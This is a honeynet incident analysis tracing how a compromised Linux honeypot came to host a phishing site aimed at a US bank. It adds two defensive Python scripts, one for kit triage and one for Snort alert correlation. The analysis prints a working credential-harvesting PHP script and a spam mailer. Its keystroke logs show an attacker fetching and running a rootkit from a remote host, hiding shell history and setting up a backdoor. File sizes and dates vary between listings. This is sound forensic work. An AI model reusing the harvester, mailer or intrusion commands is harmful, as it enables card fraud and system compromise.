Details of UK compromise

Analysis

This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed analysis of the uploaded content only covers the activity relevant to the phishing attack.

The first file downloaded was bank.zip, fetched with wget over HTTP from the Romanian host host2.go.ro (the same host the attacker later accessed over FTP).

# md5sum bank.zip
8045fd244fc96576e98a2c88b3b420b4   bank.zip

# ls -l bank.zip
-rw-r--r--    1 root     root        39988 Jul 26 10:12 bank.zip

# file bank.zip
bank.zip: Zip archive data, at least v2.0 to extract

The file was a valid zip archive, and contained the following data:

Length    Date   Time Name
-------- ----   ----    ----
1217      02-02-04 03:48 BankInternetBankingfiles/ConnectionSecured.gif
483       02-02-04 03:48 BankInternetBankingfiles/EnrollToday.gif
293       02-02-04 03:48 BankInternetBankingfiles/MemberFDIC.gif
475       02-02-04 03:48 BankInternetBankingfiles/TakeATour.gif
25088     02-02-04 03:48 BankInternetBankingfiles/Thumbs.db
51        02-02-04 03:48 BankInternetBankingfiles/arrow_red.gif
57        02-02-04 03:48 BankInternetBankingfiles/arrow_red2.gif
1214      02-02-04 03:48 BankInternetBankingfiles/bbarleft.gif
1318      02-02-04 03:48 BankInternetBankingfiles/bbarmiddle.gif
2390      02-02-04 03:48 BankInternetBankingfiles/bbarright.gif
959       02-02-04 03:48 BankInternetBankingfiles/conversionWelcome.js
222       02-02-04 03:48 BankInternetBankingfiles/footer_curve.gif
4527      02-02-04 03:48 BankInternetBankingfiles/global.css
370       02-02-04 03:48 BankInternetBankingfiles/login.gif
1489      02-02-04 03:48 BankInternetBankingfiles/logo.gif
10519     02-02-04 03:48 BankInternetBankingfiles/logon.js
947       02-02-04 03:48 BankInternetBankingfiles/showDemo.js
43        02-02-04 03:48 BankInternetBankingfiles/spacer.gif
583       02-02-04 03:48 BankInternetBankingfiles/top_nav.gif
0         07-04-04 02:56 BankInternetBankingfiles/
1752      07-04-04 03:19 check.php
22085     07-04-04 03:11 index.htm
1412      07-04-04 03:14 Scrisoare.html
--------                 -------
77494                    23 files

This was a pre-prepared web site that mimics the official login page of a major US bank. It included a server side PHP script, check.php, intended to harvest any credentials entered by an unsuspecting end user and email them to the phisher. The presence of a Thumbs.db file suggests that the contents were prepared on an MS Windows system. Scrisoare is the Romanian word for letter, suggesting an email or message of Romanian origin.

Analysis of the check.php script (shown below) reveals that it is a more advanced version of the script used in the German phishing incident. Basic format checks on the card number have been added, along with a refinement that uses the leading digit of the card number to classify it as Visa, MasterCard, American Express or Discover and to put the type in the subject line of the email. This suggests basic scripting ability rather than a simple script kiddie. Note, however, that the script stores the submitted CVV2 value in $cvv2 but then tests and emails $cvv, which it never assigns (nor does it assign $first or $last); unless PHP's register_globals setting populated $cvv from a form field of that name, the first check would always fail and redirect the victim back to the login page without sending any email.

The check.php script:

<?php
$ccnumber = $_POST['ccnumber'];
$cvv2 = $_POST['cvv2'];
$atm = $_POST['atm'];
$expmonth = $_POST['expmonth'];
$expyear = $_POST['expyear'];
if(!$ccnumber || !$cvv || !$atm || !$expmonth || !$expyear)
{       header("Location: http://69.44.XXX.XXX/.internet_banking_logon/RequestRouterifrequestCmdId-DisplayLoginPage/index.htm"); }
else
{
 if(!ereg("^[0-9]{14,16}",$ccnumber))
{       header("Location: http://69.44.XXX.XXX/.internet_banking_logon/RequestRouterifrequestCmdId-DisplayLoginPage/index.htm"); }
 else
 {
if(!ereg("^[0-9]{3,4}",$cvv))
{       header("Location: http://69.44.XXX.XXX/.internet_banking_logon/RequestRouterifrequestCmdId-DisplayLoginPage/index.htm"); }
  else
   {
$comi="phisher@xxx.us";
     $from_name="$first $last";
$from_address="CC@targetbank.com";
     $mesaj = "CreditCard Number : $ccnumber
CVV2 : $cvv
PIN : $atm
Expiration Date : $expmonth - $expyear";
     if(ereg('^4[0-9]{13,17}$', $ccnumber))
     {  mail($comi, "BANK [VISA ]", $mesaj, "From: <{$from_address}>\r\n");}
     else { }
     if(ereg('^5[0-9]{13,17}$', $ccnumber))
     {mail($comi, "BANK [MasterCard ]", $mesaj, "From: <{$from_address}>\r\n");}
     else { }
     if(ereg('^3[0-9]{13,17}$', $ccnumber))
     { mail($comi, "BANK [American Express ]", $mesaj, "From: <{$from_address}>\r\n");}
     else { }
     if(ereg('^6[0-9]{13,17}$', $ccnumber))
     {mail($comi, "BANK [Discover ]", $mesaj, "From: <{$from_address}>\r\n");}
     else { }
     echo "
     <html>
     <body>
     <script language='javascript'>
window.location='https://www.targetbank.com/internetBanking/RequestRouter?requestCmdId=DisplayLoginPage';
     </script>



     </html>
     ";
    }
   }
  }
?>

A hard-coded IP address of 66.XXX.XXX.XXX was included in the original script, suggesting that the script had already been used on another server (either another compromised host or a test machine local to the attacker). This IP address appears to be in a home DSL block belonging to a US carrier, and no web site is hosted there now. After emailing the harvested data, the script redirects the browser to the real target bank web site, presumably for added realism and to leave the victim none the wiser.
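The static triage an incident responder would do on a kit like this one, as an added example that is not part of the Honeynet Project's analysis: pull the drop address, the spoofed sender, the redirect targets and the harvested form fields out of the PHP without executing it, and list the variables the script reads but never assigns (which is how the $cvv/$cvv2 mismatch above shows up). KIT_SOURCE is a constructed, abbreviated copy of the check.php shown on this page, with the same redactions; the function names are my own.

```python
"""Static triage of a PHP phishing-kit harvester such as check.php.

Added example (not code from the Honeynet Project page): it pulls the
indicators an incident responder wants from a kit without executing it,
and flags variables that are referenced but never assigned. KIT_SOURCE
is a constructed, abbreviated copy of the check.php shown above.
"""
import json
import re

KIT_SOURCE = r'''<?php
$ccnumber = $_POST['ccnumber'];
$cvv2 = $_POST['cvv2'];
$atm = $_POST['atm'];
if(!$ccnumber || !$cvv || !$atm)
{       header("Location: http://69.44.XXX.XXX/.internet_banking_logon/index.htm"); }
else
{
$comi="phisher@xxx.us";
$from_name="$first $last";
$from_address="CC@targetbank.com";
$mesaj = "CreditCard Number : $ccnumber
CVV2 : $cvv
PIN : $atm";
if(ereg('^4[0-9]{13,17}$', $ccnumber))
{  mail($comi, "BANK [VISA ]", $mesaj, "From: <{$from_address}>\r\n");}
if(ereg('^5[0-9]{13,17}$', $ccnumber))
{mail($comi, "BANK [MasterCard ]", $mesaj, "From: <{$from_address}>\r\n");}
echo "<script>window.location='https://www.targetbank.com/internetBanking/RequestRouter?requestCmdId=DisplayLoginPage';</script>";
}
?>'''

SUPERGLOBALS = {'_POST', '_GET', '_REQUEST', '_SERVER', '_COOKIE', 'GLOBALS'}

def harvested_fields(src):
    """Form fields the kit reads from the request: what the victim is asked for."""
    return sorted(set(re.findall(r"\$_(?:POST|GET|REQUEST)\['([^']+)'\]", src)))

def string_assignments(src):
    """$var = "literal"; assignments (escaped quotes inside the literal are not handled)."""
    return {m.group(1): m.group(3)
            for m in re.finditer(r'\$(\w+)\s*=\s*(["\'])(.*?)\2\s*;', src, re.S)}

def _resolve(token, assigns):
    """Turn $var or {$var} into its literal value when one was assigned."""
    name = token.strip('{}')
    return assigns.get(name[1:], token) if name.startswith('$') else token.strip('"\'')

def mail_recipients(src):
    """Drop addresses: the first argument of every mail() call."""
    assigns = string_assignments(src)
    return sorted({_resolve(m.group(1).strip(), assigns)
                   for m in re.finditer(r'\bmail\(\s*([^,]+),', src)})

def spoofed_senders(src):
    """Addresses the kit forges in From: headers."""
    assigns = string_assignments(src)
    return sorted({_resolve(m.group(1), assigns)
                   for m in re.finditer(r'From:\s*<?\s*(\{?\$\w+\}?|[^\s<>"\\]+)', src)})

def urls(src):
    """Redirect targets and remote resources, real bank site included."""
    return sorted(set(re.findall(r'https?://[^\s"\'<>]+', src)))

def unassigned_variables(src):
    """Variables read but never assigned. With register_globals on, PHP would
    fill them from the request; otherwise they are empty and a check such as
    !$cvv always fails. Either way they show what the kit silently depends on."""
    assigned = set(re.findall(r'\$(\w+)\s*=[^=]', src))
    referenced = set(re.findall(r'\$(\w+)', src)) - SUPERGLOBALS
    return sorted(referenced - assigned)

def triage(src):
    return {'fields': harvested_fields(src),
            'recipients': mail_recipients(src),
            'spoofed_from': spoofed_senders(src),
            'urls': urls(src),
            'unassigned': unassigned_variables(src)}

if __name__ == '__main__':
    print(json.dumps(triage(KIT_SOURCE), indent=2))
```

Run it against the full check.php and the drop address, the forged From: header, the hard-coded redirect host and the harvested fields come out as a block of indicators ready for takedown requests; the unassigned list (cvv, first, last) is the caveat raised above.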

The second file downloaded using FTP was bank1.tgz:

# file bank1.tgz
bank1.tgz: gzip compressed data, from Unix

# md5sum bank1.tgz
36ae12dcc6d36b55f5289464e092a45e bank1.tgz

# ls -l bank1.tgz
-rw-r--r--    1 root     root 36065 Aug  2 10:09 bank1.tgz

The file was a valid tgz archive, and contained the following data:

./bank
./bank/BankInternetBankingfiles
./bank/BankInternetBankingfiles/ConnectionSecured.gif
./bank/BankInternetBankingfiles/EnrollToday.gif
./bank/BankInternetBankingfiles/MemberFDIC.gif
./bank/BankInternetBankingfiles/TakeATour.gif
./bank/BankInternetBankingfiles/Thumbs.db
./bank/BankInternetBankingfiles/arrow_red.gif
./bank/BankInternetBankingfiles/arrow_red2.gif
./bank/BankInternetBankingfiles/bbarleft.gif
./bank/BankInternetBankingfiles/bbarmiddle.gif
./bank/BankInternetBankingfiles/bbarright.gif
./bank/BankInternetBankingfiles/conversionWelcome.js
./bank/BankInternetBankingfiles/footer_curve.gif
./bank/BankInternetBankingfiles/global.css
./bank/BankInternetBankingfiles/login.gif
./bank/BankInternetBankingfiles/logo.gif
./bank/BankInternetBankingfiles/logon.js
./bank/BankInternetBankingfiles/showDemo.js
./bank/BankInternetBankingfiles/spacer.gif
./bank/BankInternetBankingfiles/top_nav.gif
./bank/popup.html
./bank/index.htm

The attacker moved the new files into place in the web root and used the pico editor to change popup.html to point to a test server (http://69.24.XX.XX/testing.php). Again, this was possibly a previously compromised host or a system local to the attacker.

Interestingly, because this FTP session was in plaintext and the attacker helpfully used the directory listing command, we can observe the attacker's activities and also see what other tools they have stored in their FTP area. Directory listings are often very useful in providing further background detail during incident analysis:

220 Go.ro Members FTP

USER xxxxxxxxx
331 Password required for phiser.

PASS xxxxxxxxx
230 User phisher logged in.

SYST
215 UNIX Type: L8

PASV
227 Entering Passive Mode (81,196,XXX,XXX,99,226).

LIST
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 free     web 1890 Jun 16 01:03 Desktop.zip
-rw-r--r--   1 free     web 6536 Jul 19 11:26 Scrisori.zip
-rw-r--r--   1 free     web 2788 Jun 16 18:29 bla1.txt
-rw-r--r--   1 free     web 14834 Jun 17 13:16 ebay only
-rw-r--r--   1 free     web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r--   1 free     web 467214 Jun 10 08:36 eros.tgz
-rw-r--r--   1 free     web 417494 Jul 18 22:27 ex.tgz
-rw-r--r--   1 free     web 2833 Jul 11 16:55 flit.tgz
-rw-r--r--   1 free     web 7517 Jun 11 11:53 html1.zip
-rw-r--r--   1 free     web 10383 Jul  3 19:07 index.html
-rw-r--r--   1 free     web 413 Jul 18 22:09 index.zip
drwxr-xr-x   2 free     web 54 Jul 11 04:49 listz
-rw-r--r--   1 free     web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r--   1 free     web 8192 Jun 12 07:18 massmail.zip
-rw-r--r--   1 free     web 0 Jun 17 10:09 neptun.tgz
-rw-r--r--   1 free     web 310132 Jun 11 09:25 paginabuna1.tgz
-rw-r--r--   1 free     web 54818 Jun 18 23:24 scampagededat1.zip
-rw-r--r--   1 free     web 12163 Jun  9 01:31 send.php
-rw-r--r--   1 free     web 2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r--   1 free     web 2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r--   1 free     web 2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r--   1 free     web 2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r--   1 free     web 574 Jul 11 01:08 sendbank1.tgz
-rw-r--r--   1 free     web 3238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r--   1 free     web 64443 Jun 11 02:33 spam
-rw-r--r--   1 free     web 83862 Jun  9 09:56 spamz.zip
drwxr-xr-x   2 free     web 64 Jul 16 12:05 stuff
-rw-r--r--   1 free     web 2424 Jul 19 11:27 suntrust.zip
-rw-r--r--   1 free     web 36441 Jul 18 00:52 usNEW.zip
-rw-r--r--   1 free     web 36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x   2 free     web 49 Jul 16 12:26 banka
-rw-r--r--   1 free     web 301939 Jun  8 13:17 www1.tar.gz
-rw-r--r--   1 free     web 327380 Jun  7 16:24 www1.zip
226 Transfer complete.

CWD banka
250 CWD command successful.

PASV
227 Entering Passive Mode (81,196,XXX,XXX,115,151).

LIST
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 free     web 1765 Jul   3 18:25 check.php
-rw-r--r--   1 free     web 39988 Jul  3 18:25 bank.zip
-rw-r--r--   1 free     web 40152 Jul 16 12:26 banka.zip
226 Transfer complete.

CWD ..
250 CWD command successful.

PASV
227 Entering Passive Mode (81,196,XXX,XXX,133,197).

LIST
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 free     web 1890 Jun 16 01:03 Desktop.zip
-rw-r--r--   1 free     web 6536 Jul 19 11:26 Scrisori.zip
-rw-r--r--   1 free     web 2788 Jun 16 18:29 bla1.txt
-rw-r--r--   1 free     web 14834 Jun 17 13:16 ebay only
-rw-r--r--   1 free     web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r--   1 free     web 467214 Jun 10 08:36 eros.tgz
-rw-r--r--   1 free     web 417494 Jul 18 22:27 ex.tgz
-rw-r--r--   1 free     web 2833 Jul 11 16:55 flit.tgz
-rw-r--r--   1 free     web 7517 Jun 11 11:53 html1.zip
-rw-r--r--   1 free     web 10383 Jul  3 19:07 index.html
-rw-r--r--   1 free     web 413 Jul 18 22:09 index.zip
drwxr-xr-x   2 free     web 54 Jul 11 04:49 listz
-rw-r--r--   1 free     web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r--   1 free     web 8192 Jun 12 07:18 massmail.zip
-rw-r--r--   1 free     web 0 Jun 17 10:09 neptun.tgz
-rw-r--r--   1 free     web 310132 Jun 11 09:25 paginabuna1.tgz
-rw-r--r--   1 free     web 54818 Jun 18 23:24 scampagededat1.zip
-rw-r--r--   1 free     web 12163 Jun  9 01:31 send.php
-rw-r--r--   1 free     web 2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r--   1 free     web 2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r--   1 free     web 2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r--   1 free     web 2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r--   1 free     web 1574 Jul 11 01:08 sendbank1.tgz
-rw-r--r--   1 free     web 2238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r--   1 free     web 64443 Jun 11 02:33 spam
-rw-r--r--   1 free     web 83862 Jun  9 09:56 spamz.zip
drwxr-xr-x   2 free     web 64 Jul 16 12:05 stuff
-rw-r--r--   1 free     web 2424 Jul 19 11:27 suntrust.zip
-rw-r--r--   1 free     web 36441 Jul 18 00:52 usNEW.zip
-rw-r--r--   1 free     web 36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x   2 free     web 49 Jul 16 12:26 banka
-rw-r--r--   1 free     web 301939 Jun  8 13:17 www1.tar.gz
-rw-r--r--   1 free     web 327380 Jun  7 16:24 www1.zip
226 Transfer complete.

TYPE I
200 Type set to I

PASV
227 Entering Passive Mode (81,196,XXX,XXX,113,86).

RETR bank1.tgz
150 Opening BINARY mode data connection for bank1.tgz (36065 bytes)

226 Transfer complete.
QUIT

221 Goodbye.

The contents of this FTP server home directory suggests that the phisher is heavily involved in spam and phishing activities, with pre-built content and message delivery tools targeting many well known online brands stored on this server. Based on this captured session, this phishing activity is not likely to be an isolated incident.

The third file downloaded was sendbankNEW.tgz, again fetched with wget from the Romanian host host2.go.ro.

# md5sum sendbankNEW.tgz
f38bd5496b51881ee6d13aa6f41cd156  sendbankNEW.tgz

# file sendbankNEW.tgz
sendbankNEW.tgz: gzip compressed data, from Unix

The file was a valid archive and contained the following files:

total 20
-rw-r--r--  1 1002 1002  724 Nov  4  2003 ini.inc
-rw-r--r--  1 1002 1002  101 Jun 14 23:44 list.txt
-rw-r--r--  1 1002 1002  607 Jul 17 14:21 bank.php
-rw-rw-rw-  1 root root 7564 Jul 19 00:04 bla.txt

The purpose of each file is listed below:

File      Contents and purpose
ini.inc   Spam sending configuration, included by bank.php
list.txt  A list of 5 email addresses to send the spam to. Given its small size and the Romanian email addresses linked to the attacker, this was presumably a test run to fellow gang members rather than a live phishing mailout
bank.php  A simple PHP script that reads the email lure from a text file (bla.txt) and emails it to each recipient listed in list.txt
bla.txt   The HTML email lure itself

The email lure bla.txt was notable for its good grammar and spelling, the legalese about "Equal Opportunity Lending" at the bottom, and its heavy use of images and files linked directly from the official web site of the targeted bank, all of which help it appear genuine. Ironically, the email even exhorted recipients never to give their password to fraudulent web sites or to email it to a third party.

The bank.php mass emailing script used to send the spam advertising this phishing scam is shown below:

<?php
include("ini.inc");
$mail_header  = "From: XXXXXXXXX<restore@targetbank.com>\n";
$mail_header .= "Content-Type: text/html\n";
$subject="In attention of Target Bank Members ! Restore Your Account Now!";
$body=loadini("bla.txt");
if (!($fp = fopen("list.txt", "r")))
        exit("Unable to open $listFile.");
$i=0;
print "Start time is "; print date("Y:m:d H:i"); print "\n";
while (!feof($fp)) {
        fscanf($fp, "%s", $name);
        $i++;
        mail($name, $subject, $body, $mail_header);
}
print "End time is "; print date("Y:m:d H:i"); print "\n";
print "$i"; print "emails sent."; print"\n";
?>

Although simple, it is functional and could easily have been used to send many more messages than the 5 test messages sent from the honeynet. The honeynet architecture would have restricted outbound emails, but the honeypot was taken offline for forensic analysis before any bulk spam email could be sent by the attacker.

Timeline

This honeynet was a high interaction research honeynet deployed by the UK Honeynet Project in a UK ISP data centre. After a few hours of general background network activity, the Redhat Linux 7.3 honeypot was scanned, compromised and an IRC server installed. A number of further compromises occurred, as multiple attackers located the vulnerable system and exploited it for their own purposes, before the honeypot server was used to host a phishing attack targeting a well known US bank. For brevity, this detailed timeline only covers the activity relevant to the phishing attack.

Detailed timeline:

18/07/04 - 12:30. First, the attacker exploits a buffer overflow in the Samba server on the Redhat Linux 7.3 honeypot, as can be seen from the Snort alerts shown below:

[**] [1:2103:9] NETBIOS SMB trans2open buffer overflow attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
07/18-12:30:37.816057 69.44.XXX.XXX:47938 -> 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29658 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x476AC1E0 Ack: 0x2E249707 Win: 0xB68 TcpLen: 32
TCP Options (3) => NOP NOP TS: 214020820 6062617
[Xref => http://www.digitaldefense.net/labs/advisories/DDI-1013.txt]
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0201]
[Xref => http://www.securityfocus.com/bid/7294]

[**] [1:648:7] SHELLCODE x86 NOOP [**]
[Classification: Executable code was detected] [Priority: 1]
07/18-12:30:37.817422 69.44.XXX.XXX:47938 -> 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29659 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x476AC788 Ack: 0x2E249707 Win: 0xB68 TcpLen: 32
TCP Options (3) => NOP NOP TS: 214020820 6062617
[Xref => http://www.whitehats.com/info/IDS181]

18/07/04 - 12:30. After a few retries with different offsets, the Samba exploit (CAN-2003-0201) succeeds and returns a root shell to the attacker, as shown by the Snort alert below:

[**] [1:498:6] ATTACK-RESPONSES id check returned root [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
07/18-12:30:55.511182 10.2.2.120:45295 -> 69.44.XXX.XXX:48283
TCP TTL:64 TOS:0x0 ID:56468 IpLen:20 DgmLen:140 DF
***AP*** Seq: 0x2E1F5FBE Ack: 0x47D426D5 Win: 0x16A0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 6064395 214022589
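The inference made in the two timeline entries above (an inbound exploit alert followed seconds later by the victim sending "id check returned root" back to the same peer) is a correlation an analyst would want to automate. As an added example, not part of the original write-up, the following Python parses Snort's full-alert text format and pairs each outbound ATTACK-RESPONSES alert with the Priority 1 alerts from the same attacker to the same victim in the preceding minute. ALERTS is a constructed copy of the three alerts shown above (attacker address redacted as on the page); the function names and the 60-second window are my own choices.

```python
"""Correlate Snort alerts into a compromise timeline.

Added example, not code from the Honeynet Project page: parses Snort's
full-alert text format, then pairs an outbound ATTACK-RESPONSES alert
(victim -> attacker) with the inbound Priority 1 exploit alerts
(attacker -> victim) that preceded it. ALERTS is a constructed copy of
the alerts shown above, with the attacker address redacted as on the page.
"""
import re
from datetime import datetime, timedelta

ALERTS = """\
[**] [1:2103:9] NETBIOS SMB trans2open buffer overflow attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
07/18-12:30:37.816057 69.44.XXX.XXX:47938 -> 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29658 IpLen:20 DgmLen:1500 DF

[**] [1:648:7] SHELLCODE x86 NOOP [**]
[Classification: Executable code was detected] [Priority: 1]
07/18-12:30:37.817422 69.44.XXX.XXX:47938 -> 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29659 IpLen:20 DgmLen:1500 DF

[**] [1:498:6] ATTACK-RESPONSES id check returned root [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
07/18-12:30:55.511182 10.2.2.120:45295 -> 69.44.XXX.XXX:48283
TCP TTL:64 TOS:0x0 ID:56468 IpLen:20 DgmLen:140 DF
"""

HEADER = re.compile(r'\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]')
CLASS = re.compile(r'\[Classification: ([^\]]+)\] \[Priority: (\d+)\]')
PACKET = re.compile(r'(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) (\S+):(\d+) -> (\S+):(\d+)')

def parse_alerts(text):
    """One dict per complete alert block; fragments without all three lines are skipped."""
    alerts = []
    for block in re.split(r'\n\s*\n', text.strip()):
        h, c, p = HEADER.search(block), CLASS.search(block), PACKET.search(block)
        if not (h and c and p):
            continue
        alerts.append({
            'sid': int(h.group(2)), 'msg': h.group(4),
            'classification': c.group(1), 'priority': int(c.group(2)),
            # Snort's full format carries no year; deltas within a day are unaffected
            'time': datetime.strptime(p.group(1), '%m/%d-%H:%M:%S.%f'),
            'src': p.group(2), 'sport': int(p.group(3)),
            'dst': p.group(4), 'dport': int(p.group(5)),
        })
    return alerts

def confirmed_compromises(alerts, window=timedelta(seconds=60)):
    """For each ATTACK-RESPONSES alert, collect the Priority 1 alerts that the
    responding host's peer sent to it within the window beforehand. A hit means
    an exploit attempt was followed by evidence of success, not just an attempt."""
    hits = []
    for resp in alerts:
        if not resp['msg'].startswith('ATTACK-RESPONSES'):
            continue
        victim, attacker = resp['src'], resp['dst']
        prior = [a for a in alerts
                 if a['priority'] == 1 and a['src'] == attacker and a['dst'] == victim
                 and timedelta(0) <= resp['time'] - a['time'] <= window]
        if not prior:
            continue
        first = min(prior, key=lambda a: a['time'])
        hits.append({
            'attacker': attacker, 'victim': victim,
            'service_port': first['dport'],
            'exploit_sids': sorted({a['sid'] for a in prior}),
            'exploit_msg': first['msg'],
            'response_msg': resp['msg'],
            'seconds_to_root': (resp['time'] - first['time']).total_seconds(),
        })
    return hits

if __name__ == '__main__':
    for hit in confirmed_compromises(parse_alerts(ALERTS)):
        print(f"{hit['attacker']} -> {hit['victim']}:{hit['service_port']} "
              f"{hit['exploit_msg']!r} confirmed by {hit['response_msg']!r} "
              f"after {hit['seconds_to_root']:.1f}s (sids {hit['exploit_sids']})")
```

On the three alerts above this yields a single hit: the trans2open and shellcode alerts on port 139 from 69.44.XXX.XXX, confirmed 17.7 seconds later by the root id check, which is exactly the conclusion the timeline draws by hand.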

18/07/04 - 12:30. After gaining root access, the attacker checks who they are and who else is logged into the system, then tries to hide their activity by turning off shell history logging. The Sebek keystrokes for this session are shown below:

[2004-07-18 12:30:55 10.2.2.120 11675 sh 0]unset HISTFILE; echo "### 0wned this server ###";
                                           uname -a;id;uptime;ca
[2004-07-18 12:30:55 10.2.2.120 11675 sh 0]su
[2004-07-18 12:30:59 10.2.2.120 11851 bash 0]unset HISTFILE
[2004-07-18 12:31:01 10.2.2.120 11851 bash 0]unset HISTSAVE
[2004-07-18 12:31:03 10.2.2.120 11851 bash 0]unset HISTLOG

18/07/04 - 12:31. The attacker then proceeds to download what appears to be an image file from a remote web server using the wget command line HTTP client:

[2004-07-18 12:31:06 10.2.2.120 11851 bash 0]mkdir /dev/hpd
[2004-07-18 12:31:08 10.2.2.120 11851 bash 0]cd /dev/hpd
[2004-07-18 12:31:09 10.2.2.120 11851 bash 0]id
[2004-07-18 12:31:10 10.2.2.120 11851 bash 0]w
[2004-07-18 12:31:17 10.2.2.120 11851 bash 0]wget host1.3x.ro/shv4.jpg

18/07/04 - 12:32. The attacker unpacks the image file, which is actually a gzipped tar archive, then changes into the extracted directory and runs its setup program with a password and port number:

[2004-07-18 12:32:21 10.2.2.120 11851 bash 0]tar zxvf shv4.jpg ; rm -rf shv4.jpg
[2004-07-18 12:32:23 10.2.2.120 11851 bash 0]cd shv4
[2004-07-18 12:32:28 10.2.2.120 11851 bash 0]./setup admin 2277

The attacker's view of this session can be found here. Analysis showed that the malware installed was the SHV4 rootkit, previously the subject of the Honeynet Project's Scan of the Month challenge 29.

From the SHV4 rootkit source code, we can determine what the setup command does:

# USAGE:
# ./setup pass port
#
# SSHD backdoor: ssh -l root -p port hostname
# when prompted for password enter your rootkit password
# login backdoor: DISPLAY=pass ; export DISPLAY ; telnet victim
# type anything at login, and type arf for pass and b00m r00t
#
# if u g3t cought d0nt blaim us !!

The attacker has installed and configured an encrypted (SSH) backdoor on the honeypot, listening on TCP port 2277 with the rootkit password "admin". A large amount of other activity occurred on the system over the following 12 to 72 hours, including installation of psyBNC IRC bouncers by a Romanian group, installation and use of the mole and mazz mass scanners (probably the autorooter used to compromise this honeypot), installation and re-installation of other rootkits, password sniffing and various other activities not relevant to the main phishing attack.

23/07/04 - 21:11. The attacker returns from 192.226.XXX.XXX (a Windows 2000 or Windows XP PC in Ontario) via the SSH backdoor listening on TCP port 2277 and checks if the server is still active and who is logged in:

[2004-07-23 21:11:58 xntps 0]SSH-1.5-PuTTY-Release-0.52
[2004-07-23 21:12:39 bash 0]discovery[BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                            [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]w
[2004-07-23 21:12:44 bash 0]unset HISTFILE
[2004-07-23 21:12:46 bash 0]unset HISTSAVE

23/07/04 - 21:13. The attacker reconnects, prepares a hidden directory in the Apache web server's document root and then downloads some pre-built web content from a Romanian web server, again using wget, before checking the honeypot's IP address and PHP configuration:

[2004-07-23 21:13:06 10.2.2.120 16984 xntps 0]SSH-1.5-PuTTY-Release-0.54
[2004-07-23 21:13:26 10.2.2.120 16986 bash 0]unset HISTFILE
[2004-07-23 21:13:29 10.2.2.120 16986 bash 0]cd /var/www
[2004-07-23 21:13:29 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:13:30 10.2.2.120 16986 bash 0]ls -a
[2004-07-23 21:13:35 10.2.2.120 16986 bash 0]cd html
[2004-07-23 21:13:35 10.2.2.120 16986 bash 0]ls -a
[2004-07-23 21:13:52 10.2.2.120 16986 bash 0]mk[BS][BS][BS][BS][BS][BS][BS]mkdir .internetBankingLogon
[2004-07-23 21:13:59 10.2.2.120 16986 bash 0]cd [BS][BS][BS][BS][BS][BS]ls
[2004-07-23 21:14:43 10.2.2.120 16986 bash 0]wget host2.go.ro/bank/bank.zip

23/07/04 - 21:15. The attacker attempts to extract the contents of the zip file, first with unzip and then with tar, but cannot extract it and deletes it:

[2004-07-23 21:15:23 10.2.2.120 16986 bash 0]tar xzvf ba[BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  unzip bank.zip
[2004-07-23 21:15:26 10.2.2.120 16986 bash 0]ls -a
[2004-07-23 21:15:36 10.2.2.120 16986 bash 0]tar xzvf bank.zip
[2004-07-23 21:15:42 10.2.2.120 16986 bash 0]rm -rf bank.zip

23/07/04 - 21:16. The attacker changes tools and fetches another file using FTP, again from the same host in Romania; this one does extract successfully:

[2004-07-23 21:15:53 10.2.2.120 16986 bash 0]ftp host2.go.ro
[2004-07-23 21:16:05 10.2.2.120 17044 ftp 0]hash
[2004-07-23 21:16:06 10.2.2.120 17044 ftp 0]ls
[2004-07-23 21:16:09 10.2.2.120 17044 ftp 0]cd bank
[2004-07-23 21:16:09 10.2.2.120 17044 ftp 0]ls
[2004-07-23 21:16:13 10.2.2.120 17044 ftp 0]cd ..
[2004-07-23 21:16:14 10.2.2.120 17044 ftp 0]ls
[2004-07-23 21:16:40 10.2.2.120 17044 ftp 0]get bank1.tgz
[2004-07-23 21:16:45 10.2.2.120 17044 ftp 0]bye
